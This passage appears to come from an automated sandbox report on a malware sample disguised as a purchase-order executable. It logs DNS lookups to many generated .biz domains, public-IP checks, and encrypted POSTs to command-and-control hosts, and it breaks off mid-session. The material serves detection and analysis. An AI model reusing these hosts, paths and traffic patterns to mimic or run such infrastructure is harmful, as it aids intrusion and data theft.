Dec 31, 2024 09:05:15.571506977 CET	192.168.2.4	1.1.1.1	0x663f	Standard query (0)	uhxqin.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:15.579080105 CET	192.168.2.4	1.1.1.1	0x2467	Standard query (0)	anpmnmxo.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:15.603377104 CET	192.168.2.4	1.1.1.1	0x4bdf	Standard query (0)	lpuegx.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:20.881325006 CET	192.168.2.4	1.1.1.1	0x65dd	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:26.001919985 CET	192.168.2.4	1.1.1.1	0x413a	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:26.973227024 CET	192.168.2.4	1.1.1.1	0x3748	Standard query (0)	ssbzmoy.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:28.681422949 CET	192.168.2.4	1.1.1.1	0xd171	Standard query (0)	cvgrf.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:29.436032057 CET	192.168.2.4	1.1.1.1	0xd646	Standard query (0)	npukfztj.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:29.912750006 CET	192.168.2.4	1.1.1.1	0x33c3	Standard query (0)	przvgke.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:38.908292055 CET	192.168.2.4	1.1.1.1	0x3e7b	Standard query (0)	vjaxhpbji.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:02.967417002 CET	192.168.2.4	1.1.1.1	0x6db2	Standard query (0)	xlfhhhm.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:04.888767958 CET	192.168.2.4	1.1.1.1	0xa9bb	Standard query (0)	ifsaia.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:06.503551960 CET	192.168.2.4	1.1.1.1	0x1f69	Standard query (0)	saytjshyf.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:07.519160986 CET	192.168.2.4	1.1.1.1	0x6a37	Standard query (0)	vcddkls.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:09.024770975 CET	192.168.2.4	1.1.1.1	0xd32b	Standard query (0)	fwiwk.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:09.766015053 CET	192.168.2.4	1.1.1.1	0xea78	Standard query (0)	ww7.fwiwk.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:10.770970106 CET	192.168.2.4	1.1.1.1	0x8324	Standard query (0)	tbjrpv.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:11.805351973 CET	192.168.2.4	1.1.1.1	0x2713	Standard query (0)	deoci.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:12.361407042 CET	192.168.2.4	1.1.1.1	0x6417	Standard query (0)	gytujflc.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:13.219654083 CET	192.168.2.4	1.1.1.1	0xb67c	Standard query (0)	qaynky.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:14.941992044 CET	192.168.2.4	1.1.1.1	0x29aa	Standard query (0)	bumxkqgxu.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:15.635586977 CET	192.168.2.4	1.1.1.1	0x7b05	Standard query (0)	dwrqljrr.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:16.637470007 CET	192.168.2.4	1.1.1.1	0x7fc	Standard query (0)	nqwjmb.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:17.639342070 CET	192.168.2.4	1.1.1.1	0xaa5d	Standard query (0)	ytctnunms.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:18.411299944 CET	192.168.2.4	1.1.1.1	0xdd8f	Standard query (0)	myups.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:19.647521973 CET	192.168.2.4	1.1.1.1	0xa155	Standard query (0)	oshhkdluh.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:21.600910902 CET	192.168.2.4	1.1.1.1	0x2d4	Standard query (0)	yunalwv.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:22.669192076 CET	192.168.2.4	1.1.1.1	0x1ed4	Standard query (0)	jpskm.biz	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:24.605668068 CET	192.168.2.4	1.1.1.1	0x5261	Standard query (0)	lrxdmhrr.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 09:05:06.269162893 CET	1.1.1.1	192.168.2.4	0x9df8	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:06.627377987 CET	1.1.1.1	192.168.2.4	0x8ce6	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:07.695111990 CET	1.1.1.1	192.168.2.4	0x1c54	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 31, 2024 09:05:07.695111990 CET	1.1.1.1	192.168.2.4	0x1c54	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:07.695111990 CET	1.1.1.1	192.168.2.4	0x1c54	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:07.695111990 CET	1.1.1.1	192.168.2.4	0x1c54	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:07.695111990 CET	1.1.1.1	192.168.2.4	0x1c54	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:07.695111990 CET	1.1.1.1	192.168.2.4	0x1c54	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:08.016556978 CET	1.1.1.1	192.168.2.4	0xff64	No error (0)	ssbzmoy.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:09.802153111 CET	1.1.1.1	192.168.2.4	0xa828	No error (0)	cvgrf.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:10.818840027 CET	1.1.1.1	192.168.2.4	0xceda	No error (0)	npukfztj.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:11.354835987 CET	1.1.1.1	192.168.2.4	0xfa0a	No error (0)	przvgke.biz		72.52.178.23	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:12.399024010 CET	1.1.1.1	192.168.2.4	0x26f5	No error (0)	ww7.przvgke.biz	76899.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 31, 2024 09:05:12.399024010 CET	1.1.1.1	192.168.2.4	0x26f5	No error (0)	76899.bodis.com		199.59.243.227	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:13.106596947 CET	1.1.1.1	192.168.2.4	0x7f08	No error (0)	ww12.przvgke.biz	084725.parkingcrew.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 31, 2024 09:05:13.106596947 CET	1.1.1.1	192.168.2.4	0x7f08	No error (0)	084725.parkingcrew.net		13.248.148.254	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:13.106596947 CET	1.1.1.1	192.168.2.4	0x7f08	No error (0)	084725.parkingcrew.net		76.223.26.96	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:14.022413969 CET	1.1.1.1	192.168.2.4	0xbff6	Name error (3)	zlenh.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:14.030936003 CET	1.1.1.1	192.168.2.4	0x36cf	No error (0)	knjghuig.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:15.578566074 CET	1.1.1.1	192.168.2.4	0x663f	Name error (3)	uhxqin.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:15.586034060 CET	1.1.1.1	192.168.2.4	0x2467	Name error (3)	anpmnmxo.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:15.610614061 CET	1.1.1.1	192.168.2.4	0x4bdf	No error (0)	lpuegx.biz		82.112.184.197	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:20.888358116 CET	1.1.1.1	192.168.2.4	0x65dd	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:20.888358116 CET	1.1.1.1	192.168.2.4	0x65dd	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:26.009372950 CET	1.1.1.1	192.168.2.4	0x413a	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:27.155514956 CET	1.1.1.1	192.168.2.4	0x3748	No error (0)	ssbzmoy.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:28.688427925 CET	1.1.1.1	192.168.2.4	0xd171	No error (0)	cvgrf.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:29.442986012 CET	1.1.1.1	192.168.2.4	0xd646	No error (0)	npukfztj.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:29.920113087 CET	1.1.1.1	192.168.2.4	0x33c3	No error (0)	przvgke.biz		72.52.178.23	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:05:38.915432930 CET	1.1.1.1	192.168.2.4	0x3e7b	No error (0)	vjaxhpbji.biz		82.112.184.197	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:02.975606918 CET	1.1.1.1	192.168.2.4	0x6db2	No error (0)	xlfhhhm.biz		47.129.31.212	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:04.895874977 CET	1.1.1.1	192.168.2.4	0xa9bb	No error (0)	ifsaia.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:06.511674881 CET	1.1.1.1	192.168.2.4	0x1f69	No error (0)	saytjshyf.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:07.526576996 CET	1.1.1.1	192.168.2.4	0x6a37	No error (0)	vcddkls.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:09.032285929 CET	1.1.1.1	192.168.2.4	0xd32b	No error (0)	fwiwk.biz		72.52.178.23	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:09.773904085 CET	1.1.1.1	192.168.2.4	0xea78	No error (0)	ww7.fwiwk.biz	76899.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 31, 2024 09:06:09.773904085 CET	1.1.1.1	192.168.2.4	0xea78	No error (0)	76899.bodis.com		199.59.243.227	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:10.778565884 CET	1.1.1.1	192.168.2.4	0x8324	No error (0)	tbjrpv.biz		34.246.200.160	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:11.812114954 CET	1.1.1.1	192.168.2.4	0x2713	No error (0)	deoci.biz		34.227.7.138	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:12.368541956 CET	1.1.1.1	192.168.2.4	0x6417	No error (0)	gytujflc.biz		208.117.43.225	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:13.226696014 CET	1.1.1.1	192.168.2.4	0xb67c	No error (0)	qaynky.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:14.948916912 CET	1.1.1.1	192.168.2.4	0x29aa	No error (0)	bumxkqgxu.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:15.642781019 CET	1.1.1.1	192.168.2.4	0x7b05	No error (0)	dwrqljrr.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:16.644560099 CET	1.1.1.1	192.168.2.4	0x7fc	No error (0)	nqwjmb.biz		35.164.78.200	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:17.647010088 CET	1.1.1.1	192.168.2.4	0xaa5d	No error (0)	ytctnunms.biz		3.94.10.34	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:18.417994976 CET	1.1.1.1	192.168.2.4	0xdd8f	No error (0)	myups.biz		165.160.13.20	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:18.417994976 CET	1.1.1.1	192.168.2.4	0xdd8f	No error (0)	myups.biz		165.160.15.20	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:19.654567957 CET	1.1.1.1	192.168.2.4	0xa155	No error (0)	oshhkdluh.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:21.608053923 CET	1.1.1.1	192.168.2.4	0x2d4	No error (0)	yunalwv.biz		208.117.43.225	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:22.677326918 CET	1.1.1.1	192.168.2.4	0x1ed4	No error (0)	jpskm.biz		18.246.231.120	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:06:24.785345078 CET	1.1.1.1	192.168.2.4	0x5261	No error (0)	lrxdmhrr.biz		54.244.188.177	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

pywolwnvd.biz

checkip.dyndns.org

ssbzmoy.biz

cvgrf.biz

npukfztj.biz

przvgke.biz

ww7.przvgke.biz

ww12.przvgke.biz

knjghuig.biz

lpuegx.biz

vjaxhpbji.biz

xlfhhhm.biz

ifsaia.biz

saytjshyf.biz

vcddkls.biz

fwiwk.biz

ww7.fwiwk.biz

tbjrpv.biz

deoci.biz

gytujflc.biz

qaynky.biz

bumxkqgxu.biz

dwrqljrr.biz

nqwjmb.biz

ytctnunms.biz

myups.biz

oshhkdluh.biz

yunalwv.biz

jpskm.biz

lrxdmhrr.biz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	54.244.188.177	80	8160	C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:05:07.067162991 CET	358	OUT	POST /haobwbcukjixe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 842
Dec 31, 2024 09:05:07.067193985 CET	842	OUT	Data Raw: c3 f6 7e 71 27 c5 59 48 3e 03 00 00 c1 9a 6a f1 86 42 82 21 de f1 cd e5 b3 c5 21 d3 ab 33 82 87 3a c4 8f 02 8f a3 2f 6c d9 e7 dc 85 99 15 bc 93 c4 93 7d 6f b2 63 da f4 be 98 a0 1f dc b9 68 e5 0f 56 b7 b2 1f 4b 9c 74 ad 51 77 4a 70 40 3c be 1b 7e Data Ascii: ~q'YH>jB!!3:/l}ochVKtQwJp@<~7$zd-:v}D\|/OKl7uaY 7 \C'2.q\dylD98>MOmBGCrHd\|ve8d>z4c.q!
Dec 31, 2024 09:05:07.773703098 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:05:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=bc087f28b3104ee26c32ad7c8c0a0a74\|8.46.123.189\|1735632307\|1735632307\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	54.244.188.177	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:05:07.236408949 CET	353	OUT	POST /mshapsve HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:05:07.236438036 CET	778	OUT	Data Raw: 5c 4d 3e 50 d8 b1 c6 da fe 02 00 00 b1 8d 78 bf 83 04 71 fd cf e0 9a f7 86 31 b9 17 3e 71 d3 35 0a 5a b9 b4 2e f9 56 e4 dd ac 88 93 4f 20 1b 9d 36 19 02 ff 3a 85 14 28 c0 ff 22 c9 4d 5a a5 d4 77 9d 09 a1 81 62 09 8c 48 8f bc 82 01 26 54 be 4b 38 Data Ascii: \M>Pxq1>q5Z.VO 6:("MZwbH&TK8-%W`;6=w'-5qRo.]U2/z\Z,E5TgR04-3V6)nok"#yk_-=8G4M$#=vX6plL
Dec 31, 2024 09:05:07.947119951 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:05:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=15a9855571d9bd2701eff9739d078246\|8.46.123.189\|1735632307\|1735632307\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	132.226.8.169	80	2124	C:\Users\user\AppData\Local\Temp\Microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:05:07.713083029 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 31, 2024 09:05:19.279946089 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 08:05:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 31, 2024 09:05:19.288301945 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 31, 2024 09:05:20.751298904 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 08:05:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	18.141.10.107	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:05:08.113981009 CET	350	OUT	POST /mmfoish HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:05:08.114059925 CET	778	OUT	Data Raw: 80 a3 61 22 a0 d6 55 e7 fe 02 00 00 1c 5a 91 c7 68 50 b7 f9 3e 78 6b 4b 96 0e d1 f3 e1 34 ec bd 6b 3a 3c 37 af c2 e1 e4 2b 28 87 a4 8f 93 a9 d8 e1 00 ed ec ab 2e 24 30 5e 4b 90 f2 70 d3 af 13 d4 49 6a 71 05 f2 f3 11 fc 9c 4a d4 bb 8d 81 9f 3e 82 Data Ascii: a"UZhP>xkK4k:<7+(.$0^KpIjqJ>X*F&\G9meO!+s7o[hE !^hDMTr4[we%Ey2<Ax`Ju+O19PJZ@Q26{tx
Dec 31, 2024 09:05:09.464982033 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:05:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=c3ed7e6ff124a21e28555962855e08a1\|8.46.123.189\|1735632309\|1735632309\|0\|1\|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	54.244.188.177	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:05:09.960571051 CET	348	OUT	POST /oxojrkg HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:05:09.960571051 CET	778	OUT	Data Raw: 84 0a 58 3b e1 f2 e1 1d fe 02 00 00 d7 e3 64 14 f0 48 b6 3e 36 c2 9c 38 08 25 04 a7 2a ec 39 0f db 0c 90 dd bb 3a 44 70 b5 e1 73 81 f0 1c 84 ac 2f 10 12 95 3d 1a 4a 01 ae 4e c8 88 95 1c f4 3e c9 b1 59 65 98 e2 5a 48 46 52 72 48 b1 37 3b 13 cc 64 Data Ascii: X;dH>68%9:Dps/=JN>YeZHFRrH7;dP?pOCL>R~Q~6Ao,m,11$!CG8fo]7nUJ)XA'Y6rRhIzcEe[8`%=kk?e[^fR}>6$R@,h
Dec 31, 2024 09:05:10.745225906 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:05:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=bd13f9f4b860d1fddd320b15e2f80ccd\|8.46.123.189\|1735632310\|1735632310\|0\|1\|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49745	44.221.84.105	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:05:10.862463951 CET	352	OUT	POST /bufnddtl HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:05:10.862483025 CET	778	OUT	Data Raw: 5c a2 1e 76 f6 0b 7e c0 fe 02 00 00 5c 1f d2 b9 c5 13 1a 65 7c de 55 bf 28 21 29 e8 f0 75 0d 9d 43 c4 5c 4f df 54 8e b0 d0 e3 41 d3 95 78 d7 2c 4a f2 27 c5 32 07 2c 3e 02 d4 dd 5b 2b df 68 7a d0 9c 7c 05 9e ea dd 67 fb 6d 83 10 24 9c 94 9d 13 7b Data Ascii: \v~\e\|U(!)uC\OTAx,J'2,>[+hz\|gm${*nU%U}zf&ZB!Bcjk\6lwPIy5zF"g5F?z8\|]]YTBHAOx3>~Ti-<2[6ANr.1egH"#_)}jDiB"oW;%#
Dec 31, 2024 09:05:11.315371037 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:05:11 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=5b29dd654a61560130d16804a070da1f\|8.46.123.189\|1735632311\|1735632311\|0\|1\|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49746	72.52.178.23	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:05:11.437917948 CET	353	OUT	POST /xpqdcslnor HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:05:11.438761950 CET	778	OUT	Data Raw: 9f 5f 69 de 74 c0 e5 c7 fe 02 00 00 cf 64 4e 3e ac 01 54 f7 3c e7 ca 22 e5 15 0a c8 0e b6 3d d2 84 35 b3 61 24 70 e0 5c d6 2e c7 91 be e4 f2 a0 be a2 c5 86 c2 f3 ee e8 d6 19 3f 9f 4d 48 d5 c8 69 a9 73 d7 5c 4a 54 71 5c 7f 64 60 c2 17 c4 ec b2 cf Data Ascii: _itdN>T<"=5a$p\.?MHis\JTq\d`(c%6bIf)_/w@.XUKs0R6uN;}kuaNw"f_i04EG{,yISZv%=u8g@LUui:
Dec 31, 2024 09:05:11.945173025 CET	284	IN	HTTP/1.1 302 Moved Temporarily Date: Tue, 31 Dec 2024 08:05:11 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Location: http://ww7.przvgke.biz/xpqdcslnor?usid=27&utid=10221865676 Cache-Control: no-cache Pragma: no-cache Access-Control-Allow-Origin: *
Dec 31, 2024 09:05:12.935214996 CET	346	OUT	POST /ewl HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:05:12.935214996 CET	778	OUT	Data Raw: 72 48 e4 a3 e1 2a f1 a7 fe 02 00 00 e6 02 8d 81 c7 13 69 ad 95 75 fc b9 fe 10 e5 d5 75 ad 8b 17 6c 17 56 3c 15 cc 20 fe d7 b9 f5 2e a7 fc 1f 0e aa 4f a0 f1 7e 7b 73 90 ff 00 c3 6f 73 14 3f b7 73 48 8c 98 1e 78 d2 15 28 a6 c2 a2 1c 2d 4a 9a a2 43 Data Ascii: rH*iuulV< .O~{sos?sHx(-JCvUsUT.0j-,Mi2Q$TOJOP(]I7g(x<mKK:K#!OgD]6j:aU5M~=:r\|4V?<WJ8
Dec 31, 2024 09:05:13.078196049 CET	278	IN	HTTP/1.1 302 Moved Temporarily Date: Tue, 31 Dec 2024 08:05:13 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Location: http://ww12.przvgke.biz/ewl?usid=27&utid=10221865931 Cache-Control: no-cache Pragma: no-cache Access-Control-Allow-Origin: *

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49747	199.59.243.227	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
